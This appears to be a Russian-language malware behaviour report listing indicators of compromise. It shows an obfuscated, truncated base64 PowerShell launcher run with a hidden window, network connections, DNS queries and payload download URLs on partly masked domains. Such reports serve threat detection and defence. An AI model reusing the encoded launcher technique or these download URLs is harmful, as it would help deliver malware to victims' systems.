Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAE4AZQBXAC0AbwBCAEoAZQBDAHQAIAAgAHMAWQBTAHQAZQBtAC4AaQBPAC4AYwBPAE0AcAByAGUAcwBzAEkAbwBOAC4ARABFAGYAbABBAFQAZQBTAHQAUgBFAEEAbQAoACAAWwBTAHkAcwB0AEUAbQAuAEkAbwAuAE0AZQBNAG8AUgB5AHMAdAByAG...
- 'l7.si':80
- 'l7.si':443
- 'ra####lli.com.br':80
- 'si##ria.de':80
- 'si##ria.de':443
- 'lg##b.co.uk':80
- 'lg##b.co.uk':443
- http://l7.si/6gfpfd/
- http://ra####lli.com.br/lu3UF5Uff/
- http://si##ria.de/4eo0Ri2DLD/
- http://lg##b.co.uk/CdNcx0A5/
- 'l7.si':443
- 'si##ria.de':443
- 'lg##b.co.uk':443
- DNS ASK l7.si
- DNS ASK so#####-svietidla.com
- DNS ASK ra####lli.com.br
- DNS ASK si##ria.de
- DNS ASK na##x.de
- DNS ASK lg##b.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAE4AZQBXAC0AbwBCAEoAZQBDAHQAIAAgAHMAWQBTAHQAZQBtAC4AaQBPAC4AYwBPAE0AcAByAGUAcwBzAEkAbwBOAC4ARABFAGYAbABBAFQAZQBTAHQAUgBFAEEAbQAoACAAWwBTAHkAcwB0AEUAbQAuAEkAbwAuAE0AZQBNAG8AUgB5AHMAdAByAG...' (со скрытым окном)